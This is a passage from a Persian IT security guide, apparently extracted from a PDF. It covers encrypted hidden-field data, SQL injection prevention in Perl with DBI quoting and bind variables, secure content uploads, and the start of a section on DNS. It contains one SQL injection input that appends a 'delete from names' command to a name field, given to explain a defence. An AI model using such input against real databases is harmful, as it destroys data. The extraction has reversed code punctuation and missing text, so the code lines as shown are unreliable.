ﻣﻲﺷﻮﺩ ﺍﺯ ﻫﻤﺔ ﺍﻃﻼﻋﺎﺕ ﺭﻣﺰﺷﺪﻩ ،ﻓﺸﺮﺩﻩﺷﺪﻩ ،ﻭ ﻣﺮﺗﺐﺷﺪﻩ ﺣﻔﺎﻇﺖ ﺑﻌﻤﻞ ﺁﻳﺪ.
ﺭﺷﺘﺔ ﺣﺎﺻﻠﻪ ﺭﺍ ﺑﻮﺳﻴﻠﺔ Base64ﻛﺪﮔﺬﺍﺭﻱ ،ﺭﻣﺰﮔﺬﺍﺭﻱ ،ﻭ ﻓﺸﺮﺩﻩﺳﺎﺯﻱ ﻛﻨﻴﺪ ﻭ ﺭﺷﺘﺔ ﺣﺎﺻﻞ ﺭﺍ ﺑﺎﺯﮔﺮﺩﺍﻧﻴﺪ. .٧
ﺍﺯ ﺍﻳﻦ ﺭﺷﺘﺔ ﻛﺪﮔﺬﺍﺭﻱﺷﺪﺓ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﺓ ﻓﺸﺮﺩﻩ ﺑﺮﺍﻱ ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲURL ،ﻫﺎﻱ ﺗﺮﻛﻴﺒﻲ ،ﻭ cookieﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ. .٨
ﺣﺎﻝ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻭ ﺗﺄﻳﻴﺪ ﺍﻋﺘﺒﺎﺭ ﺍﻳﻦ ﺭﺷﺘﺔ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ،ﻛﺎﻓﻲ ﺍﺳﺖ ﮔﺎﻣﻬﺎﻱ ﺯﻳﺮ ﺭﺍ ﺩﻧﺒﺎﻝ ﻛﻨﻴﺪ ﺗﺎ ﻋﻤﻠﻴﺎﺕ ﻗﺒﻠﻲ ﻣﻌﻜﻮﺱ ﺷﻮﺩ:
ﺭﺷﺘﻪ ﻛﺪ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﺓ ﻓﺸﺮﺩﻩ ﺭﺍ ﺍﺯ ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲURL ،ﻫﺎﻱ ﺗﺮﻛﻴﺒﻲ ،ﻭ ﻳﺎ cookieﻫﺎ ﺑﺪﺳﺖ ﺁﻭﺭﻳﺪ. .١
ﻛﺪﮔﺬﺍﺭﻱ Base64ﺭﺍ ﻳﺎﻓﺘﻪ ﻭ ﺍﺯ ﺭﺷﺘﺔ ﺍﺻﻠﻲ ﺟﺪﺍ ﺳﺎﺯﻳﺪ. .٢
ﺭﺷﺘﺔ ﻛﺪﺷﺪﺓ Base64ﺭﺍ ﻛﺪﮔﺸﺎﻳﻲ ﻛﻨﻴﺪ. .٣
HMACﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﺍﻋﺘﺒﺎﺭ ﻛﻨﻴﺪ .ﺍﮔﺮ ﺍﻋﺘﺒﺎﺭ ﺁﻥ ﺗﺄﻳﻴﺪ ﻧﺸﻮﺩ ﻧﺸﺎﻧﮕﺮ ﺁﻥ ﺍﺳﺖ ﻛﻪ ﺭﺷـﺘﺔ ﺑﺪﺳـﺖﺁﻣـﺪﻩ ﺩﺳـﺘﻜﺎﺭﻱ ﺷـﺪﻩ ﺍﺳـﺖ .ﺩﺭ .٤
ﺍﻳﻨﺼﻮﺭﺕ ﻳﻚ ﭘﻴﻐﺎﻡ ﺧﻄﺎ ﺑﺎﺯﮔﺮﺩﺍﻧﻴﺪ.
ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻧﻤﺎﻳﻴﺪ. .٥
ﻃﻮﻝ ﺭﺷﺘﺔ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﻳﺪ ﻭ ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺭﺷﺘﺔ ﺍﻭﻟﻴﻪ ﺑﺎ ﻃﻮﻝ ﺻﺤﻴﺢ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ .ﺍﻳﻦ ﻣﺮﺣﻠﻪ ﺑـﻪ ﺍﻳـﻦ .٦
ﻻ ﺑﻪ ﺍﻧﺘﻬﺎﻱ ﺩﺍﺩﺓ ﻭﺭﻭﺩﻱ ﺑﺎﻳﺘﻬﺎﻱ ﺧﺎﻟﻲ ﺍﺿﺎﻓﻪ ﻣﻲﻛﻨﺪ ﺗﺎ ﻃـﻮﻝ ﺁﻧـﺮﺍ ﺑـﻪ ﻳـﻚ ﻣﻘـﺪﺍﺭ ﺩﻟﻴﻞ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﺗﺎﺑﻊ ﺭﻣﺰﮔﺬﺍﺭﻱ ،ﻣﻌﻤﻮ ﹰ
ﻣﺸﺨﺺ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴﻴﻦﺷﺪﻩ ﺑﺮﺳﺎﻧﺪ.
ﺩﺍﺩﺓ ﻓﺸﺮﺩﻩﺷﺪﻩ ﺭﺍ ﺍﺯ ﻓﺸﺮﺩﮔﻲ ﺧﺎﺭﺝ ﻛﻨﻴﺪ. .٧
ﺑﺮﭼﺴﺐ ﺯﻣﺎﻧﻲ ﺭﺍ ﺍﺯ ﺍﺑﺘﺪﺍﻱ ﺩﺍﺩﺓ ﺑﺪﺳﺖﺁﻣﺪﻩ ﺑﺨﻮﺍﻧﻴﺪ .ﺍﮔﺮ ﺑﺮﭼﺴﺐ ﺯﻣﺎﻧﻲ ﺧﻴﻠﻲ ﻗﺪﻳﻤﻲ ﺑﻮﺩ ،ﺩﺍﺩﺓ ﻣﺮﺑﻮﻃﻪ ﺭﺍ ﻗﺒﻮﻝ ﻧﻜﻨﻴﺪ. .٨
ﺍﻃﻼﻋﺎﺕ ﺑﺎﻗﻴﻤﺎﻧﺪﻩ ﺭﺍ ﺑﻪ ﻓﺮﺳﺘﻨﺪﺓ ﺍﻭﻟﻴﺔ ﺩﺭﺧﻮﺍﺳﺖ ﺑﺎﺯﮔﺮﺩﺍﻧﻴﺪ ﺗﺎ ﻣﻘﺪﺍﺭ ﻫﻤﺔ ﻣﺘﻐﻴﺮﻫﺎﻱ ﺍﻭﻟﻴﻪ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﺭﺷﺘﻪ ﺑﺪﺳﺖ ﺁﻭﺭﺩ. .٩
ﺍﻳﻦ ﻣﺮﺍﺣﻞ ﺑﻨﻈﺮ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩ ﻫﺴﺘﻨﺪ ﻭ ﻣﺤﺎﺳﺒﺎﺕ ﺑﺴﻴﺎﺭ ﺳﻨﮕﻴﻨﻲ ﺩﺍﺭﻧﺪ ،ﺍﻣﺎ ﺣﻘﻴﻘﺖ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻛﺪﮔﺬﺍﺭﻱ ﺩﺍﺩﻩ ﺑﺴﻴﺎﺭ ﺳـﺎﺩﻩ ﺍﺳـﺖ ﻭ
ﻣﻲﺗﻮﺍﻧـﺪ ﺑـﺎ ﺳـﺮﻋﺖ ﺑـﺴﻴﺎﺭ ﺯﻳـﺎﺩﻱ ﺍﻧﺠـﺎﻡ ﺷـﻮﺩ .ﻫﻤﭽﻨـﻴﻦ ﺑـﺮﺍﻱ ﺍﻳﻨﻜـﺎﺭ ﺗﻮﺍﺑـﻊ ﻛﺘﺎﺑﺨﺎﻧـﻪﺍﻱ ﺁﻣـﺎﺩﺓ ﺍﺳـﺘﻔﺎﺩﻩ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻩ ،ﻣﺎﻧﻨـﺪ
CGI::EncryptFormﺩﺭ ﺯﺑﺎﻥ .Perl
ﺑﺨﺶ ﭘﻨﺠﻢ
ﭼﻨﺎﻧﭽﻪ ﺑﺮﺍﻱ ﻗﺪﺭﺗﻤﻨﺪﺗﺮ ﻛﺮﺩﻥ ﻃﺮﺍﺣﻲ ﺻﻔﺤﺎﺕ ﻭﺏ ﺧﻮﺩ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ،ﺣﺘﻤﹰﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛـﻪ
ﺁﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺑﺎ ﺭﻋﺎﻳﺖ ﻛﻠﻴﺔ ﺟﻮﺍﻧﺐ ﺍﻣﻨﻴﺘﻲ ﻣﺴﺘﻘﺮ ﺷﺪﻩﺍﻧﺪ ﻭ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ.
ﺑﺮﺍﻱ ﻧﻤﺎﻳﺶ ﻣﺴﺘﻘﻴﻢ ﻣﺤﺘﻮﻳﺎﺕ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﺍﺯ ﻏﺮﺑﺎﻝﺳﺎﺯﻱ ﻭ ﮔﻴﻮﻣﻪﮔﺬﺍﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ
ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﭘﻴﺸﺘﺮ ﺫﻛﺮ ﺷﺪ ،ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺍﺳﺖ ﻛﻪ ﻫﻤﺔ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺍﺯ ﻃﺮﻑ ﻛﺎﺭﺑﺮﺍﻥ ﻭﺍﺭﺩ ﻣﻲﺷﻮﺩ ﻏﺮﺑﺎﻝ ﺷﻮﻧﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷـﻮﻳﻢ ﻛـﻪ
ﺩﺭ ﺁﻧﻬﺎ ﺗﻨﻬﺎ ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻱ ﻣﺠﺎﺯ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﻫﻨﮕﺎﻡ ﻛﺎﺭ ﺑﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ،SQLﺑﺮﺭﺳﻲ ﺩﺍﺩﻩﻫﺎﻱ ﻭﺭﻭﺩﻱ ﻛﺎﺭﺑﺮﺍﻥ ﭘﻴﺶ ﺍﺯ ﻓﺮﺳﺘﺎﺩﻥ
ﺁﻧﻬﺎ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﻫﻤﻴﺖ ﻣﻀﺎﻋﻔﻲ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ .ﺩﻟﻴﻞ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺎﻳﺪ ﺟﻠﻮﻱ ﺍﻳﺠﺎﺩ ﺩﺳﺘﻮﺭﺍﺕ ﺩﻟﺨـﻮﺍﻩ SQLﺗﻮﺳـﻂ
ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺍﺭﺳﺎﻝ ﺁﻧﻬﺎ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ SQLﮔﺮﻓﺘﻪ ﺷﻮﺩ.
ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﮔﺮ ﻳﻚ ﻓﺮﻡ ﻭﺏ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﺯ ﻛﺎﺭﺑﺮ ﻧﺎﻡ ﺍﻭ ﺭﺍ ﺑﭙﺮﺳﺪ ﻭ ﺳﭙﺲ ﺍﻳـﻦ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺩﺭ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩ ﺫﺧﻴـﺮﻩ ﻛﻨـﺪ ،ﻗﺎﺑـﻞ
ﭘﻴﺶﺑﻴﻨﻲ ﺍﺳﺖ ﻛﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ ﺑﻪ ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩ ﻧﺎﻡ ﺍﻳﻦ ﻓﺮﺩ ﺭﺍ ﺍﺯ ﻳﻚ ﻓﻴﻠﺪ ﺧﻮﺍﻫـﺪ ﮔﺮﻓـﺖ ،ﺁﻧـﺮﺍ ﺩﺭ ﻳـﻚ
ﻣﺘﻐﻴﺮ ﻣﺜﻞ $nameﺫﺧﻴﺮﻩ ﺧﻮﺍﻫﺪ ﻛﺮﺩ ،ﻭ ﺳﭙﺲ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﻣﺘﻐﻴﺮ ﻳﻚ ﺩﺳﺘﻮﺭ SQLﺧﻮﺍﻫﺪ ﺳﺎﺧﺖ .ﺑﻪ ﺍﻳﻦ ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﺔ perl
ﺗﻮﺟﻪ ﻛﻨﻴﺪ:
;)’$name = param(‘name
;)”;)’sql_send(“insert into names (name) value (‘$name
٣٧١ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﻳﻦ ﺭﻭﺵ ﭼﻨﺪﺍﻥ ﺍﻳﻤﻦ ﻧﻴﺴﺖ ،ﭼﺮﺍﻛﻪ ﺍﮔﺮ ﻛﺴﻲ ﺑﺎ ﺳﺎﺧﺘﺎﺭ ﺑﺮﻧﺎﻣﺔ ﺷﻤﺎ ﺁﺷﻨﺎﻳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﻣﻲﺗﻮﺍﻧﺪ ﻭﺭﻭﺩﻱ ﺧﺎﺻﻲ ﺭﺍ ﺑﻌﻨـﻮﺍﻥ
ﻧﺎﻡ ﻭﺍﺭﺩ ﻓﻴﻠﺪ ﻣﺮﺑﻮﻃﻪ ﻛﻨﺪ ﻛﻪ ﺑﺎﻋﺚ ﺷﻮﺩ ﻳﻚ ﻓﺮﻣﺎﻥ SQLﺑﻪ ﺧﻮﺍﺳﺖ ﺍﻭ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻳﺪ .ﺍﻳﻦ ﻧﺎﻡ ﺭﺍ ﺩﺭ ﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ:
;)’ ;Insert into names (name) value (‘John Smith’)”; delete from names
ﺑﻴﺸﺘﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ SQLﺩﺭﺻﻮﺭﺕ ﺩﺭﻳﺎﻓﺖ ﭼﻨﻴﻦ ﻣﺘﻨﻲ ﺑﻌﻨﻮﺍﻥ ﻭﺭﻭﺩﻱ ،ﻳﻚ ﻗﻠﻢ ﺩﺍﺩﻩ ﺭﺍ ﻭﺍﺭﺩ ﺟﺪﻭﻝ namesﻣﻲﻛﻨﻨﺪ ،ﺳﭙﺲ
ﺗﻤﺎﻡ ﺩﺍﺩﻩﻫﺎﻱ ﺁﻥ ﺟﺪﻭﻝ ﺭﺍ ﭘﺎﻙ ﻣﻲﻧﻤﺎﻳﻨﺪ ،ﻭ ﭘﺲ ﺍﺯ ﺁﻥ ﻳﻚ ﺧﻄﺎﻱ SQLﮔﺰﺍﺭﺵ ﻣﻲﺩﻫﻨﺪ.
ﻻ ﺩﺍﺩﻩﻫﺎﻱ ﻭﺭﻭﺩﻱ ﺭﺍ ﺑﻪ ﺩﻗﺖ ﻏﺮﺑـﺎﻝ ﻣـﻲﻛﻨﻴـﺪ،
ﺭﻭﺵ ﻣﺤﺎﻓﻈﺖ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺯ ﺍﻳﻦ ﺩﺳﺘﻪ ﺍﺯ ﺣﻤﻼﺕ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺍﻭ ﹰ
٢٣٣
ﺛﺎﻧﻴﹰﺎ ﺗﻤﺎﻡ ﺍﻃﻼﻋﺎﺕ ﻏﺮﺑﺎﻝﺷﺪﻩ ﺭﺍ ﭘﻴﺶ ﺍﺯ ﻓﺮﺳﺘﺎﺩﻥ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ SQLﺑﻪ ﻧﺤﻮ ﻣﻨﺎﺳﺒﻲ ﮔﻴﻮﻣﻪﮔﺬﺍﺭﻱ ﻣﻲﻧﻤﺎﻳﻴﺪ.
ﺑﻬﺘﺮﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﮔﻴﻮﻣﻪﮔﺬﺍﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺗﺎﺑﻊ ﺍﺳﺖ ﻛﻪ ﻫﻤﻮﺍﺭﻩ ﻫﻨﮕﺎﻡ ﻓﺮﺳﺘﺎﺩﻩﺷﺪﻥ ﻫﺮ ﺭﺷﺘﻪ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ SQLﺑﺼﻮﺭﺕ
ﻣﺠﺰﺍ ﻓﺮﺍﺧﻮﺍﻧﻲ ﺷﻮﺩ .ﺍﮔﺮ ﺷﻤﺎ ﺍﺯ ﺯﺑﺎﻥ perlﻭ ﻳﻚ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ DBIﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ،ﺑﻴﺸﺘﺮ ﮔﺮﺩﺍﻧﻨـﺪﻩﻫـﺎﻱ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩ ﻳـﻚ ﺭﻭﺵ
ﮔﻴﻮﻣﻪﮔﺬﺍﺭﻱ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺑﺮﺍﻱ ﺷﻤﺎ ﺍﻧﺠﺎﻡ ﺩﻫﺪ ﻭ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺁﻥ ﺑﺼﻮﺭﺕ ﺯﻳﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ:
# $dbh is a DBI object that represents a handle to an open database connection
;))’$qname = $dbh->quote(param(‘name
;)”)$dbh->do(“insert into name (name) value($qname
ﺭﻭﺵ ﺩﻳﮕﺮ ﺁﻥ ﺍﺳﺖ ﻛﻪ queryﻫﺎﻱ SQLﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ bindingﻣﺘﻐﻴﺮﻫﺎ ،ﭘﻴﺶﺗﺮﺟﻤﻪ ﻧﻤﺎﻳﻴﺪ .ﺍﻳﻦ ﺭﻭﺵ ﺷﻤﺎ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﺪ ﻛﻪ
ﺑﺘﻮﺍﻧﻴﺪ queryﻫﺎﻱ SQLﺭﺍ ﺑﺠﺎﻱ ﻣﺘﻐﻴﺮﻫﺎﻱ ﺣﻘﻴﻘﻲ ﺑﺎ ﺟﺎﻳﮕﺎﻫﻬﺎﻱ ﺁﻥ ﻣﺘﻐﻴﻴﺮﻫﺎ ﺗﺮﺟﻤﻪ ﻧﻤﺎﻳﻴﺪ .ﺑﺮﺍﻱ ﻧﻤﻮﻧﻪ ،ﺩﺭ ﻣﺜﺎﻝ ﻗﺒﻞ ﻣـﻲﺗـﻮﺍﻥ
queryﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻭﺍﺳﻂ ﻓﺮﺿﻲ SQLﺍﻧﺠﺎﻡ ﺩﺍﺩ ﻛﻪ ﺍﺯ ﻋﻼﻣﺖ @ ﺑﻌﻨﻮﺍﻥ ﺟﺎﻳﮕﺎﻩ ﻣﺘﻐﻴﺮﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ:
;)'$name = param('name
sql_bind($func,1,$name); # bind the variable name to the first variable
sql_exec($func); # execute the bound function
ﺍﮔﺮ ﺍﺯ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ DBIﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ،ﻣﻌﻤﻮ ﹰ
ﻻ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻳﻦ ﺗﺎﺑﻊ ﺭﺍ ﺑﺼﻮﺭﺕ ﺯﻳﺮ ﺑﻨﻮﻳﺴﻴﺪ:
233 Quoting
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٧٢
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻣﺤﺘﻮﺍ
ﻛﺎﺭﺑﺮﺍﻥ ﺷﻤﺎ ﭼﮕﻮﻧﻪ ﻣﺤﺘﻮﻳﺎﺕ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺭﺍ ﺑﻪﺭﻭﺯ ﻣﻲﻛﻨﻨﺪ؟ ﺩﺭ ﺍﻭﻟﻴﻦ ﺭﻭﺯﻫﺎﻳﻲ ﻛﻪ ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﻭﺏ ﺁﻏﺎﺯ ﺑﻪ ﻛـﺎﺭ ﻛـﺮﺩﻩ ﺑـﻮﺩ
ﺑﻴــﺸﺘﺮ ﻣﺤﺘﻮﺍﻫــﺎ ﺗﻮﺳــﻂ ﺑﺮﻧﺎﻣــﻪﻧﻮﻳــﺴﺎﻥ ﻭ ﺗﻮﺳــﻌﻪﺩﻫﻨــﺪﮔﺎﻥ ﻭ ﺑﻮﺳــﻴﻠﺔ ﭘﺮﺩﺍﺯﺷــﮕﺮﻫﺎﻱ ﻣــﺘﻦ ﻭ ﻳــﺎ HTMLﺑــﺼﻮﺭﺕ ﻣــﺴﺘﻘﻴﻢ ﺭﻭﻱ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻣﺪﻧﺪ؛ ﺍﻣـﺎ ﺍﻣـﺮﻭﺯﻩ ﺑﻴـﺸﺘﺮ ﻣﺤﺘﻮﺍﻫـﺎ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺷﺨـﺼﻲ ﻭ Macﻫـﺎ ﺍﻳﺠـﺎﺩ ﻭ ﺳـﭙﺲ ﺭﻭﻱ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ uploadﻣﻲﺷﻮﻧﺪ .ﺍﻳﻦ uploadﺩﺭ ﺣﻘﻴﻘﺖ ﻳﻚ ﻋﻤﻠﻴﺎﺕ ﺍﻧﺘﻘﺎﻝ ﻓﺎﻳﻞ ﺍﺳﺖ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻫﻢ ﻣﻲﺗﻮﺍﻧـﺪ ﻣـﻮﺭﺩ
ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ .ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﭘﻴﺸﺘﺮ ﺑﺤﺚ ﺷﺪ ،ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﻣﻠﺰﻡ ﺷﻮﻧﺪ ﻛﻪ ﺍﺯ ﻳـﻚ ﺳﻴـﺴﺘﻢ ﺍﻧﺘﻘـﺎﻝ ﻓﺎﻳـﻞ ﺍﻳﻤـﻦ ﻧﻈﻴـﺮ ،scp
WebDAVﺭﻭﻱ ،SSLﻭ ﻳﺎ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻧﺎﺍﻣﻦ ﺍﻧﺘﻘﺎﻝ ﻓﺎﻳﻞ ﺭﻭﻱ ﻳﻚ ﺷﺒﻜﺔ ﺧﺼﻮﺻﻲ ﻣﺠﺎﺯﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ .ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻣﻤﻜـﻦ
ﺍﺳﺖ ﺍﻧﺘﻘﺎﻝ ﻓﻴﺰﻳﻜﻲ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺯ ﻃﺮﻳﻖ ﻭﺳﺎﻳﻠﻲ ﻫﻤﭽﻮﻥ ﺩﻳﺴﻜﻬﺎﻱ floppyﻭ ﻳﺎ ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﺗﺮﺟﻴﺢ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﻣﻴﺰﺑﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ،ﻭ ﻟﺬﺍ ﻣﻬﺎﺟﻤﻲ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﻛﻨﺘﺮﻝ DNSﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺧﻮﺩ ﺩﺭﺁﻭﺭﺩ ﻭ ﻳﺎ ﻣﺤﺘﻮﻳﺎﺕ ﺁﻧﺮﺍ ﻣﺨـﺪﻭﺵ ﻧﻤﺎﻳـﺪ ،ﻣﻌﻤـﻮ ﹰ
ﻻ
ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧﺴﺖ ﺍﺯ ﺁﻥ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﮔﺎﻡ ﻣﺆﺛﺮ ﺟﻬﺖ ﻧﻔﻮﺫ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ.
ﺑﺠﺰ ﺗﺒﺪﻳﻞ ﻧﺎﻣﻬﺎﻱ ﺍﻧﻔﺮﺍﺩﻱ ﻣﻴﺰﺑﺎﻧﻬﺎ DNS ،ﻫﻤﭽﻨﻴﻦ ﺳﻴﺴﺘﻤﻲ ﺑﺮﺍﻱ downloadﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺗﻤﺎﻡ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ
ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ .ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ﺍﻧﺘﻘﺎﻝ ﻧﺎﺣﻴﻪ ٢٣٤ﻧﺎﻡ ﺩﺍﺭﺩ ﻭ ﻫﻤﺎﻥ ﻓﺮﺁﻳﻨﺪﻱ ﺍﺳﺖ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺛﺎﻧﻮﻳﻪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﺗـﺎ ﻳـﻚ
ﻧﺴﺨﻪ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﻧﺪ.
ﭘﺮﻭﺗﻜﻞ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ DNSﻫﻢ ﻣﻲﺗﻮﺍﻧﺪ UDPﺑﺎﺷﺪ ﻭ ﻫﻢ .TCPﺍﺯ ﺁﻧﺠﺎ ﻛﻪ UDPﻳﻚ ﭘﺮﻭﺗﻜﻞ ﺳﺮﻳﻊ ﻭ ﻣﺒﺘﻨﻲ ﺑﺮ ﺑـﺴﺘﻪﻫـﺎﻱ
ﻻ ﺑﺮﺍﻱ ﻓﺮﺁﻳﻨﺪ ﻭﺍﻗﻌﻲ ﺗﺒﺪﻳﻞ ﻧﺎﻡ ﻣﻴﺰﺑـﺎﻥ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
ﺍﻃﻼﻋﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﻣﻴﺰﺍﻥ ﻣﺤﺪﻭﺩﻱ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺍﻧﺘﻘﺎﻝ ﻣﻲﺩﻫﺪ ،ﻣﻌﻤﻮ ﹰ
